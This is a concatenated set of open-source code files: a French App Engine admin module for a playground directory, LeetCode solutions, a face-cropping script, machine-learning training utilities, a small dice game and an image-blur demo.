= True\r\n if not aire_de_jeux.valider:\r\n aire_de_jeux.valider = True\r\n change = True\r\n if change:\r\n aire_de_jeux.put()\r\n query_detail = Detail.query()\r\n for detail in query_detail:\r\n change = False\r\n if not detail.date_creation:\r\n detail.date_creation = curent_date\r\n change = True\r\n if not detail.valider:\r\n detail.valider = True\r\n change = True\r\n if change:\r\n detail.put()\r\n query_commentaire = Commentaire.query()\r\n for commentaire in query_commentaire:\r\n change = False\r\n if not commentaire.date_creation:\r\n commentaire.date_creation = curent_date\r\n change = True\r\n if not commentaire.valider:\r\n commentaire.valider = True\r\n change = True\r\n if change:\r\n commentaire.put()\r\n query_photos = Photo.query()\r\n for photo in query_photos:\r\n change = False\r\n if not photo.date_creation:\r\n photo.date_creation = curent_date\r\n change = True\r\n if not photo.valider:\r\n photo.valider = True\r\n change = True\r\n if change:\r\n photo.put()\r\n self.redirect(\"/admin/\")\r\n\r\n\r\nclass AValiderHandler(Handler):\r\n def render_main(self, liste_aire_de_jeux, liste_details, liste_comments, liste_photos):\r\n self.render(\"a_valider.html\",\r\n liste_aire_de_jeux=liste_aire_de_jeux,\r\n liste_details=liste_details,\r\n liste_comments=liste_comments,\r\n liste_photos=liste_photos)\r\n\r\n def get(self):\r\n query_aire_de_jeux = AireDeJeux.query(AireDeJeux.valider==False).fetch(100)\r\n query_details = Detail.query(Detail.valider==False).fetch(100)\r\n query_comments = Commentaire.query(Commentaire.valider==False).fetch(100)\r\n query_photos = Photo.query(Photo.valider==False).fetch(100)\r\n valider(False)\r\n self.render_main(query_aire_de_jeux, query_details, query_comments, query_photos)\r\n\r\n def post(self):\r\n urlsafe_key = self.request.get('key')\r\n logging.info(\"key=\" + urlsafe_key)\r\n key = ndb.Key(urlsafe=urlsafe_key)\r\n enregistrement = key.get()\r\n enregistrement.valider = True\r\n enregistrement.put()\r\n\r\n\r\nclass AjouterFichierHandler(Handler):\r\n def render_main(self):\r\n upload_url = blobstore.create_upload_url('/admin/upload_aire_de_jeux')\r\n self.render(\"ajout_fichier_aire_de_jeux.html\", upload_url=upload_url)\r\n\r\n def get(self):\r\n self.render_main()\r\n\r\n\r\nclass AjouterFichierBlobHandler(blobstore_handlers.BlobstoreUploadHandler):\r\n def post(self):\r\n key_ville = ndb.Key(urlsafe=self.request.get('key_ville'))\r\n ville = key_ville.get()\r\n departement = Departement.query(Departement.numero == ville.departement).get()\r\n upload_files = self.get_uploads('file')\r\n blob_info = upload_files[0]\r\n blob_key = blob_info.key()\r\n blob_reader = blobstore.BlobReader(blob_key)\r\n jason_value = unicode(blob_reader.read(), 'latin-1')\r\n data = json.loads(jason_value)\r\n liste_nom = {}\r\n list_coordonnees = []\r\n for aire_de_jeux in data:\r\n nom = aire_de_jeux[5][0][1][0]\r\n if nom[:4] == 'Aire':\r\n nom = nom[15:]\r\n coordonnees = ndb.GeoPt(float(aire_de_jeux[1][0][0][0]),\r\n float(aire_de_jeux[1][0][0][1]))\r\n if coordonnees not in list_coordonnees:\r\n list_coordonnees.append(coordonnees)\r\n if nom in liste_nom.iterkeys():\r\n liste_nom[nom] += 1\r\n else:\r\n liste_nom[nom] = 0\r\n # test_unique = AireDeJeux.query(ndb.AND(AireDeJeux.nom == nom, AireDeJeux.ville == key_ville))\r\n count = \"\"\r\n if liste_nom[nom] > 0:\r\n count = \" \" + str(liste_nom[nom])\r\n existe = True\r\n while existe:\r\n indice = random_str()\r\n already_existe = AireDeJeux.query(AireDeJeux.indice == indice)\r\n if 
already_existe.count() == 0:\r\n existe = False\r\n new_detail = Detail(indice=indice,\r\n valider=True,\r\n coordonnees=coordonnees)\r\n detail_key = new_detail.put()\r\n new_aire_de_jeux = AireDeJeux(nom=nom + count,\r\n ville=key_ville,\r\n indice=indice,\r\n detail=detail_key,\r\n valider=True,\r\n url=ville.departement + \"/\" + ville.nom + \"/\" + nom)\r\n new_aire_de_jeux.put()\r\n ville.nbr_aire_de_jeux += 1\r\n departement.nbr_aire_de_jeux += 1\r\n departement.put()\r\n ville.put()\r\n self.redirect(\"/admin/\")\r\n\r\n\r\nclass AjouterBordureVille(webapp2.RequestHandler):\r\n def get(self):\r\n taskqueue.add(url='/admin/ajout_limite_ville')\r\n self.redirect(\"/admin/\")\r\n\r\n def post(self):\r\n max_data_access = 5000\r\n curs = Cursor(urlsafe=self.request.get('cursor'))\r\n query_ville = Commune.query()\r\n if curs:\r\n liste_ville, next_cursor, more = query_ville.fetch_page(max_data_access, start_cursor=curs)\r\n else:\r\n liste_ville, next_cursor, more = query_ville.fetch_page(max_data_access)\r\n for ville in liste_ville:\r\n query_aire_de_jeux = AireDeJeux.query(AireDeJeux.ville == ville.key)\r\n marge = 0.0015\r\n ville.NWcoordonnees = ndb.GeoPt(ville.coordonnees.lat + marge, ville.coordonnees.lon - marge)\r\n ville.SEcoordonnees = ndb.GeoPt(ville.coordonnees.lat - marge, ville.coordonnees.lon + marge)\r\n for aire_de_jeux in query_aire_de_jeux:\r\n detail = aire_de_jeux.detail.get()\r\n if detail.coordonnees:\r\n if detail.coordonnees.lat > ville.NWcoordonnees.lat:\r\n ville.NWcoordonnees.lat = detail.coordonnees.lat + marge/5\r\n elif detail.coordonnees.lat < ville.SEcoordonnees.lat:\r\n ville.SEcoordonnees.lat = detail.coordonnees.lat - marge/5\r\n if detail.coordonnees.lon > ville.SEcoordonnees.lon:\r\n ville.SEcoordonnees.lon = detail.coordonnees.lon + marge/5\r\n elif detail.coordonnees.lon < ville.NWcoordonnees.lon:\r\n ville.NWcoordonnees.lon = detail.coordonnees.lon - marge/5\r\n ville.put()\r\n if more:\r\n taskqueue.add(url='/admin/ajout_limite_ville', params={'cursor': next_cursor.urlsafe()}, countdown=86400)\r\n\r\n\r\nclass AjouterBordureDepartement(webapp2.RequestHandler):\r\n def get(self):\r\n taskqueue.add(url='/admin/ajout_limite_departement')\r\n self.redirect(\"/admin/\")\r\n\r\n def post(self):\r\n max_data_access = 5000\r\n query_departement = Departement.query()\r\n liste_departement, next_cursor, more = query_departement.fetch_page(max_data_access)\r\n for departement in liste_departement:\r\n query_commune = Commune.query(Commune.departement == departement.numero)\r\n marge = 0.002\r\n test = False\r\n for commune in query_commune:\r\n if not test:\r\n departement.NWcoordonnees = ndb.GeoPt(commune.coordonnees.lat,\r\n commune.coordonnees.lon)\r\n departement.SEcoordonnees = ndb.GeoPt(commune.coordonnees.lat,\r\n commune.coordonnees.lon)\r\n test = True\r\n elif commune.coordonnees:\r\n if commune.coordonnees.lat > departement.NWcoordonnees.lat:\r\n departement.NWcoordonnees.lat = commune.coordonnees.lat + marge/5\r\n elif commune.coordonnees.lat < departement.SEcoordonnees.lat:\r\n departement.SEcoordonnees.lat = commune.coordonnees.lat - marge/5\r\n if commune.coordonnees.lon > departement.SEcoordonnees.lon:\r\n departement.SEcoordonnees.lon = commune.coordonnees.lon + marge/5\r\n elif commune.coordonnees.lon < departement.NWcoordonnees.lon:\r\n departement.NWcoordonnees.lon = commune.coordonnees.lon - marge/5\r\n departement.put()\r\n\r\nclass cleanUrlHandler(webapp2.RequestHandler):\r\n def get(self):\r\n curent_date = 
datetime.datetime.now()\r\n query_aire_de_jeux = AireDeJeux.query()\r\n for aire_de_jeux in query_aire_de_jeux:\r\n change = False\r\n if not aire_de_jeux.urldirty:\r\n aire_de_jeux.urldirty = aire_de_jeux.url\r\n aire_de_jeux.url = urlParse(aire_de_jeux.url)\r\n change = True \r\n if change:\r\n aire_de_jeux.put()\r\n\r\nclass addmissingnumberurl(webapp2.RequestHandler):\r\n def get(self):\r\n query_aire_de_jeux = AireDeJeux.query(AireDeJeux.ville==ndb.Key(\"Commune\",4534100874493952));\r\n for aire_de_jeux in query_aire_de_jeux:\r\n array_url = aire_de_jeux.url.split(\"/\")\r\n if array_url[-1] != urlParse(aire_de_jeux.nom):\r\n array_url[-1] = urlParse(aire_de_jeux.nom)\r\n aire_de_jeux.url = \"/\".join(array_url)\r\n aire_de_jeux.put()\r\n self.redirect(\"/admin/\")\r\n\r\nclass ajouterCarvinHandler(webapp2.RequestHandler):\r\n def get(self):\r\n ville_carvin = Commune(nom=\"Courrière\", departement=\"62\", CP=\"62220\", coordonnees = ndb.GeoPt(50.4924, 2.9582), SEcoordonnees = ndb.GeoPt(50.4924, 2.9582), NWcoordonnees = ndb.GeoPt(50.4924, 2.9582))\r\n #ville_carvin.put()\r\n new_departement = Departement(lettre=\"Pas de Calais\", numero=\"62\", nbr_aire_de_jeux=0, SEcoordonnees = ndb.GeoPt(50.4924, 2.9582), NWcoordonnees = ndb.GeoPt(50.4924, 2.9582) )\r\n new_departement.put()\r\n self.redirect(\"/admin/\")\r\n\r\napp = webapp2.WSGIApplication([\r\n ('/admin/', MainHandler),\r\n ('/admin/upload', UploadHandler),\r\n ('/admin/upload_aire_de_jeux', AjouterFichierBlobHandler),\r\n ('/admin/process_csv', ProcessCsv),\r\n ('/admin/departement_csv', DepartementCsv),\r\n ('/admin/process_doublon', SuprimeDoubleVille),\r\n ('/admin/netoyerDoublon', NetoyerDoublonHandler),\r\n ('/admin/lowerCaseVille', LowerCase),\r\n ('/admin/rest_compte_dep_ville', RecompteHandler),\r\n ('/admin/creat_sitemap_blob', SitemapBlobHandler),\r\n ('/admin/ajout_date_creation', AjoutDateHandler),\r\n ('/admin/a_valider', AValiderHandler),\r\n ('/admin/ajout_fichier', AjouterFichierHandler),\r\n ('/admin/ajout_limite_ville', AjouterBordureVille),\r\n ('/admin/ajout_limite_departement', AjouterBordureDepartement),\r\n ('/admin/addmissingnumberurl', addmissingnumberurl),\r\n ('/admin/cleanUrl', cleanUrlHandler),\r\n ('/admin/ajouterCarvin', ajouterCarvinHandler)\r\n], debug=True)\r\n","repo_name":"stephane-duteriez/airedejeux","sub_path":"uploadVille.py","file_name":"uploadVille.py","file_ext":"py","file_size_in_byte":23572,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17086681731","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/6/14 18:08\n# @Author : bocheng.wu\n\n\nclass Solution:\n def isValid(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n stack = list()\n match = {'{': '}', '[': ']', '(': ')'}\n for i in s:\n if i == '{' or i == '(' or i == '[':\n stack.append(i)\n else:\n if len(stack) == 0:\n return False\n\n top = stack.pop()\n\n if match[top] != i:\n return False\n\n if len(stack) != 0:\n return False\n return True\n","repo_name":"yychuyu/LeetCode","sub_path":"problems/0020_Valid_Parentheses/sankforever.py","file_name":"sankforever.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"34"} +{"seq_id":"7914865799","text":"#!/usr/bin/env python\n# coding=utf-8\n# @Time : 2018/4/4 19:33\n# @Author : litianshuang\n# @Email : litianshuang@jingdata.com\n# @File : 64.py\n# @Desc :\n\nclass Solution(object):\n def minPathSum(self, grid):\n \"\"\"\n :type 
m: int\n :type n: int\n :rtype: int\n \"\"\"\n m = len(grid)\n if m <= 0:\n return 0\n n = len(grid[0])\n\n dp = []\n for i in range(0, m):\n dp.append([])\n for j in range(0, n):\n dp[i].append(grid[i][j])\n if i > 0 and j > 0 :\n dp[i][j] += min(dp[i-1][j], dp[i][j-1])\n elif i > 0:\n dp[i][j] += dp[i-1][j]\n elif j > 0:\n dp[i][j] += dp[i][j-1]\n return dp[m-1][n-1]\n\n\n\nif __name__ == \"__main__\":\n s = Solution()\n print(s.minPathSum([\n [1,3,1],\n [1,5,1],\n [4,2,1]\n ]))","repo_name":"tcltsh/leetcode","sub_path":"leetcode/src/64.py","file_name":"64.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70773903137","text":"import cv2 as cv\nimport dlib\nimport numpy\nimport sys\nimport matplotlib.pyplot as plt\nimport math\n\nPREDICTOR_PATH = \"shape_predictor_68_face_landmarks.dat\"\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(PREDICTOR_PATH)\ndef get_landmarks(im):\n rects = detector(im, 1)\n\n if len(rects) > 1:\n raise TooManyFaces\n if len(rects) == 0:\n raise NoFaces\n\n # the feature extractor (predictor) requires a rough bounding box as input\n # to the algorithm. This is provided by a traditional face detector (\n # detector) which returns a list of rectangles, each of which corresponding\n # a face in the image\n return numpy.array([[p.x, p.y] for p in predictor(im, rects[0]).parts()])\n\nfor i in range(1,41):\n image_file='data/'+str(i)+'.jpg'\n image = cv.imread(image_file)\n temp=get_landmarks(image)\n preds=temp\n image = cv.imread(image_file)\n try:\n image_height, image_width, image_depth = image.shape\n except:\n print('cannot load image:', image_file)\n minX=1000\n maxX=0\n minY=1000\n maxY=0\n for var in preds:\n if minX > var[0]:\n minX = var[0]\n if maxX < var[0]:\n maxX = var[0]\n if minY > var[1]:\n minY = var[1]\n if maxY < var[1]:\n maxY = var[1]\n \n ### crop face image\n scale=90/math.sqrt((minX-maxX)*(minY-maxY))\n width=maxX-minX\n height=maxY-minY\n cenX=width/2\n cenY=height/2\n\n x= int( (minX+cenX)*scale )\n y= int( (minY+cenY)*scale )\n#print x,y,scale\n\n resized_image = cv.resize(image, (0,0), fx=scale, fy=scale, interpolation=cv.INTER_CUBIC)\n rh,rw,rc = resized_image.shape\n\n #\n crop_width = 160\n crop_height = 244\n left = 0\n top = 0\n right = 0\n bottom = 0\n cx = x\n cy = y\n \n if x < crop_width/2:\n left = int(crop_width/2 - x)\n cx = x + left\n if y < crop_height/2:\n top = crop_height/2 - y\n cy = y + top\n if rw - x < crop_width/2:\n right = crop_width/2 + x - rw;\n if rh - y < crop_height/2:\n bottom = crop_height/2 + y - rh\n #\n \n crop_image = cv.copyMakeBorder(resized_image,top, int(bottom), int(left), int(right),cv.BORDER_REFLECT)\n\n crop_image = crop_image[cy-int(crop_height//2):cy+int(crop_height/2), cx-int(crop_width/2):cx+int(crop_width/2), :]\n cv.imwrite(str(i)+'.jpg',crop_image)\n","repo_name":"xqlin98/Data-Visualization--3d-deformation-transfer","sub_path":"python_transfer/cut.py","file_name":"cut.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5622619962","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 13 14:11:11 2017\n\n@author: Andrei\n\"\"\"\n\nimport django, os\nos.environ['DJANGO_SETTINGS_MODULE'] = \"JungeAkademie.settings\"\ndjango.setup()\nfrom modulo.models import Exam\nfrom openpyxl import load_workbook\n\nexamsFile = \"../database.xlsx\"\n\ndef 
insertExams(databaseFile):\n    workbook = load_workbook(databaseFile)\n    worksheet = workbook['exams']\n    nrRows = len(tuple(worksheet.rows))\n    nrCols = len(tuple(worksheet.columns))\n    \n    add = 0\n    for row in worksheet.iter_rows(min_row=2, min_col=1, max_row=nrRows, max_col=nrCols):\n        cell = row[0]\n        if cell.value is None:\n            continue\n        i, added = Exam.objects.get_or_create(exam_type=cell.value.strip())\n        add += 1 if added else 0\n\n    print(\"Number of added exams =\", add)\n    print('Number of exams in database =', len(Exam.objects.all()))\n    #workbook.close()\n\nif __name__ == \"__main__\":\n    insertExams(examsFile)\n    input(\"Press ENTER to exit program...\")","repo_name":"dinaaladawy/Modulo","sub_path":"App/JungeAkademie/databaseHelpers/insertExams.py","file_name":"insertExams.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"38735053787","text":"from collections import defaultdict \n\nclass Solution:\n    def nextGreaterElement(self, nums1: [int], nums2: [int]) -> [int]:\n        stack = []\n        res = defaultdict(lambda : -1)\n        for num in nums2:\n            while stack and stack[-1] < num:\n                res[stack[-1]] = num\n                stack.pop()\n\n            stack.append(num)\n\n        return [res[num] for num in nums1]","repo_name":"Akua-Serwaa-Nkrumah/CompetitiveProgramming","sub_path":"Camp/BonusProblems/NextGreat.py","file_name":"NextGreat.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"36481439030","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport Q_learning_RBF\r\n\r\n\r\nclass SGDRegressor:\r\n    def __init__(self, D):\r\n        print(\"Hello TensorFlow!\")\r\n        lr = 0.1\r\n\r\n        # create inputs, targets, params\r\n        # matmul doesn't like when w is 1-D\r\n        # so we make it 2-D and then flatten the prediction\r\n        self.w = tf.Variable(tf.random_normal(shape=(D, 1)), name='w')\r\n        self.X = tf.placeholder(tf.float32, shape=(None, D), name='X')\r\n        self.Y = tf.placeholder(tf.float32, shape=(None,), name='Y')\r\n\r\n        # make prediction and cost\r\n        # matmul is matrix multiplication; reshaping with [-1] flattens the result to 1-D\r\n        Y_hat = tf.reshape( tf.matmul(self.X, self.w), [-1] )\r\n        delta = self.Y - Y_hat\r\n        \r\n        # squared-error cost to be minimised\r\n        cost = tf.reduce_sum(delta * delta)\r\n\r\n        # ops we want to call later, typical gradient descent\r\n        self.train_op = tf.train.GradientDescentOptimizer(lr).minimize(cost)\r\n        self.predict_op = Y_hat\r\n        \r\n        # start the session and initialize params\r\n        init = tf.global_variables_initializer()\r\n        self.session = tf.InteractiveSession()\r\n        self.session.run(init)\r\n\r\n    # One gradient-descent step at a time, which is what we want in RL\r\n    def partial_fit(self, X, Y):\r\n        self.session.run(self.train_op, feed_dict={self.X: X, self.Y: Y})\r\n\r\n    def predict(self, X):\r\n        return self.session.run(self.predict_op, feed_dict={self.X: X})\r\n\r\n\r\nif __name__ == '__main__':\r\n    Q_learning_RBF.SGDRegressor = SGDRegressor\r\n    Q_learning_RBF.main()","repo_name":"PeterKaras/Reinforcement-Learning","sub_path":"rl2/SGD_withTensorflow.py","file_name":"SGD_withTensorflow.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"38899926661","text":"import random\n\ndef throw_dice(player,enemy):\n    while True:\n        enemy_throw = random.randint(1, 6)\n        enemy_throw2 = random.randint(1, 6)\n        enemy_total = enemy_throw + enemy_throw2\n
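        # random.randint(1, 6) is inclusive on both ends, i.e. a fair\n        # six-sided die; random.randrange(1, 6) would never roll a 6.\n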
\" wyrzucił \" + str(enemy_total) + \" z kośćmi \" + str(enemy_throw) + \" i \" + str(enemy_throw2))\n command = input(\"# Rzuć albo pas \")\n if command.lower() == \"pas\":\n return 0\n if command.lower() == \"rzuć\":\n player_throw = random.randrange(1,6)\n player_throw2 = random.randrange(1,6)\n player_total = player_throw + player_throw2\n print(player.name + \" wyrzucił \" + str(player_total) + \" z kośćmi \" + str(player_throw) + \" i \" + str(player_throw2))\n if player_total > enemy_total:\n return 1\n if player_total < enemy_total:\n return 0\n else:\n print(\"REMIS! Powtórka:\\n\")\n","repo_name":"AlexKwiatek/Samples","sub_path":"STYKS/play_dice.py","file_name":"play_dice.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15783790866","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 24 11:37:53 2020\r\n\r\n@author: Family\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nimg_ori = cv2.imread('images/bananos.jpg')\r\ncv2.imshow('Img-Ori', img_ori)\r\n\r\n#Kernel's\r\nkernel_3x3 = np.ones((3,3),np.float32)/(3*3)\r\noutput = cv2.filter2D(img_ori,-1,kernel_3x3)\r\n#cv2.imshow('Promedio 3x3',output)\r\n\r\nkernel_5x5 = np.ones((5,5),np.float32)/(5*5)\r\noutput = cv2.filter2D(img_ori,-1,kernel_5x5)\r\n#cv2.imshow('Promedio 5x5',output)\r\n\r\nkernel_31x31 = np.ones((31,31),np.float32)/(31*31)\r\noutput = cv2.filter2D(img_ori,-1,kernel_31x31)\r\n#cv2.imshow('Promedio 31x31',output)\r\n\r\n#Filtro Gaussiano\r\noutput = cv2.GaussianBlur(img_ori,(3,3),0) #0: Máscara automática.\r\ncv2.imshow('Desv. Gauss 3x3', output)\r\n\r\noutput = cv2.GaussianBlur(img_ori,(11,11),0) #0: Máscara automática.\r\ncv2.imshow('Desv. Gauss 11x11', output)\r\n\r\noutput = cv2.GaussianBlur(img_ori,(21,21),0) #0: Máscara automática.\r\ncv2.imshow('Desv. 
Gauss 3x3', output)\r\n\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"joanayala/artificial-vision","sub_path":"Scripts_arvis/Filter_kernel.py","file_name":"Filter_kernel.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"37469683163","text":"import torch\nimport torch.nn.functional as F\n\n##############################################\n##############################################\n##############################################\ndef train(model, data, train_idx, optimizer):\n model.train()\n\n optimizer.zero_grad()\n out = model(data.x, data.adj_t)[train_idx]\n loss = F.nll_loss(out, data.y.squeeze(1)[train_idx])\n loss.backward()\n optimizer.step()\n\n return loss.item()\n\n\n@torch.no_grad()\ndef test(model, data, split_idx, evaluator):\n model.eval()\n\n out = model(data.x, data.adj_t)\n y_pred = out.argmax(dim=-1, keepdim=True)\n\n train_acc = evaluator.eval({\n 'y_true': data.y[split_idx['train']],\n 'y_pred': y_pred[split_idx['train']],\n })['acc']\n valid_acc = evaluator.eval({\n 'y_true': data.y[split_idx['valid']],\n 'y_pred': y_pred[split_idx['valid']],\n })['acc']\n test_acc = evaluator.eval({\n 'y_true': data.y[split_idx['test']],\n 'y_pred': y_pred[split_idx['test']],\n })['acc']\n\n return train_acc, valid_acc, test_acc\n\n##############################################\n##############################################\n##############################################\ndef train_partition(model, data, optimizer, part_id, use_cut_edges=False):\n partition = data.parts[part_id]\n train_part = data.train_parts[part_id]\n \n model[part_id].train()\n\n optimizer[part_id].zero_grad()\n if use_cut_edges:\n out = model[part_id](data.x[partition, :], \n data.adj_t_parts[part_id])[train_part]\n loss = F.nll_loss(out, data.y.squeeze(1)[partition][train_part])\n else:\n out = model[part_id](data.x, data.adj_t)[partition][train_part]\n loss = F.nll_loss(out, data.y.squeeze(1)[partition][train_part])\n loss.backward()\n optimizer[part_id].step()\n return loss.item()","repo_name":"CongWeilin/LLCG-OGB-PyTorch","sub_path":"ogbn-products/utils/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"304331127","text":"from typing import Tuple\n\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn as nn\nfrom omegaconf import DictConfig\nfrom pytorch_lightning.core import LightningModule\nfrom pytorch_lightning.metrics.functional import accuracy\nfrom torch import optim\nfrom torch.optim.lr_scheduler import StepLR\n\nfrom src.utils import load_class\n\n\nclass Runner(LightningModule):\n def __init__(self, model: nn.Module, config: DictConfig):\n super().__init__()\n self.model = model\n self.hparams.update(config)\n self.config = config\n print(self.hparams)\n\n def forward(self, x):\n return self.model(x)\n\n def configure_optimizers(self):\n args = dict(self.config.optimizer.params)\n args.update({\"params\": self.model.parameters()})\n\n opt = load_class(module=optim, name=self.config.optimizer.type, args=args)\n scheduler = StepLR(optimizer=opt, step_size=10)\n\n return [opt], [scheduler]\n\n def _comm_step(self, x, y):\n y_hat = self(x)\n loss = self.model.loss(y_hat, y)\n\n pred = torch.argmax(y_hat, dim=1)\n acc = accuracy(pred, y)\n\n return y_hat, loss, acc\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n 
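# _comm_step (shared with validation_step below) does one forward pass and\n        # returns the output, the model's own loss, and argmax accuracy.\n        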
_, loss, acc = self._comm_step(x, y)\n\n self.log(\n \"train_loss\", loss, on_step=True, on_epoch=True, prog_bar=True, logger=True\n )\n self.log(\n \"train_acc\", acc, on_step=True, on_epoch=True, prog_bar=True, logger=True\n )\n\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n _, loss, acc = self._comm_step(x, y)\n self.log(\n \"val_loss\", loss, on_step=True, on_epoch=True, prog_bar=True, logger=True\n )\n self.log(\n \"val_acc\", acc, on_step=True, on_epoch=True, prog_bar=True, logger=True\n )\n\n return {\"val_loss\": loss, \"val_acc\": acc}\n","repo_name":"Ronalmoo/DataScience","sub_path":"mnist-classification/src/runner/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74448713697","text":"import sys\n\nINF = float('inf')\n\n# input functions\ndef read_int():\n return int(sys.stdin.readline())\n\ndef read_ints():\n return list(map(int, sys.stdin.readline().split()))\n\n# output functions\ndef print_yes_no(condition):\n print('YES' if condition else 'NO')\n\ndef is_prime(num):\n if num > 1:\n for i in range(2, int(num/2)+1):\n if (num % i) == 0:\n return False\n else:\n return True\n else:\n return False\n \ndef solve():\n n = read_int()\n m = 4\n\n while True:\n if is_prime(m):\n m += 1\n continue\n else:\n temp = n - m \n if is_prime(temp):\n m += 1\n continue \n else:\n print(\"%d %d\"%(m,temp))\n break \n\n m += 1 \n\nif __name__ == '__main__':\n solve()","repo_name":"m3hrab/cp-gym","sub_path":"codeforces/CF800/DesignTutorial_LearnfromMath.py","file_name":"DesignTutorial_LearnfromMath.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"87952899","text":"from data import ReutersData\nimport os\nfrom classifiar import KNN\nimport article\n\nTRAINING_DATA_PATH = \"data/\"\n\nK = 25\n\n\ndef full_path(base, filename):\n if base[-1] != \"/\":\n base += \"/\"\n return base + filename\n\n\nclass Model:\n def __init__(self, path):\n training_data_files = []\n for root, _, files in os.walk(TRAINING_DATA_PATH):\n for name in files:\n training_data_files.append(os.path.join(root, name))\n\n training_data = ReutersData(training_data_files)\n\n self.classifiar = KNN(K)\n self.classifiar.fit(training_data.get_data())\n\n def predict(self, testing_data_path):\n testing_data_files = []\n for root, _, files in os.walk(testing_data_path):\n for name in files:\n testing_data_files.append(os.path.join(root, name))\n\n testing_data = ReutersData(testing_data_files).get_data()\n\n predictions = []\n ground_truth = []\n for ar in testing_data:\n ground_truth.append(ar.tags)\n predictions.append(tuple(self.classifiar.predict(ar)))\n print({\"true\": ar.tags, \"predicted\": predictions[-1]})\n\n return tuple(predictions)\n","repo_name":"snirlugassy/workshop_challenge","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10761945622","text":"import tensorflow as tf\n\n# Thanks, https://github.com/tensorflow/tensorflow/issues/4079\ndef LeakyReLU(x, leak=0.1, name=\"lrelu\"):\n with tf.variable_scope(name):\n f1 = 0.5 * (1.0 + leak) \n f2 = 0.5 * (1.0 - leak)\n return f1 * x + f2 * 
abs(x)\n\n\n","repo_name":"stanford-iprl-lab/sceneflownet","sub_path":"segNet2/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"34"} +{"seq_id":"18548677774","text":"r\"\"\"\nModule with the basic classes defining transformation models\n\"\"\"\n\nimport numpy\nfrom ..util import vectorized_dot_product\n\n__all__ = ['Model']\n\nclass Model(object):\n r\"\"\"Base Class for Transformations\n\n A transformation is defined as a map:\n\n .. math::\n \\phi: \\Omega \\mapsto \\Omega\n\n\n where :math:`\\Omega \\subseteq \\Re^N` and the\n transform has a parameter vector :math:`\\theta \\in \\Re^M`\n with :math:`M` the number of parameters\n\n Notes\n ----------\n We define :math:`\\phi(x; \\theta) = (\\phi_1(x;\\theta),\\ldots, \\phi_N(x;\\theta))`, then\n the jacobian of the transform with respect to the parameter :math:`\\theta` as\n\n .. math::\n [D_\\theta\\phi(x; \\theta)]_{ij} = \\frac{\\partial \\phi_i(x; \\theta)}{\\partial \\theta_j},\n i=1\\ldots N, j=1\\ldots M\n\n and the jacobian of the transform with respect to the location :math:`x` as\n\n .. math::\n [D_x\\phi(x; \\theta)]_{ij} = \\frac{\\partial \\phi_i(x; \\theta)}{\\partial x_j},\n i, j =1\\ldots N\n\n\n attributes\n ----------\n `parameter` : array-like, shape (n_parameters)\n Stores the parameter vector :math:`\\theta` of the transform.\n\n `identity` : array-like, shape (n_parameters)\n Stores the parameter value :math:`\\theta_0` such that :math:`\\phi(x; \\theta_0) = x`.\n\n `bounds` : array-like, shape (n_parameters, 2)\n Stores the upper and lower bounds for each component of the parameter vectors\n :math:`\\theta` such that :math:`\\text{bounds}_{i0} \\leq \\theta_i \\leq \\text{bounds}_{i1}`\n\n\n References\n ----------\n \"\"\"\n\n def __init__(self):\n self.parameter = self.identity\n\n @property\n def identity(self):\n r\"\"\"\n Stores the parameter value :math:`\\theta_0` such that :math:`\\phi(x; \\theta_0) = x`.\n \"\"\"\n return None\n\n def transform_points(self, points):\n r\"\"\"Transform a set of points.\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Points to be transformed\n\n\n Returns\n -------\n y : array-like, shape (n_points, n_dimensions)\n :math:`y = \\phi(x)`\n\n \"\"\"\n raise NotImplementedError()\n\n def transform_vectors(self, points, vectors):\n r\"\"\"Transform a set of vectors located in space.\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the vectors to be transformed\n\n v : array-like, shape (n_points, n_dimensions)\n Vectors to be transformed\n\n Returns\n -------\n w 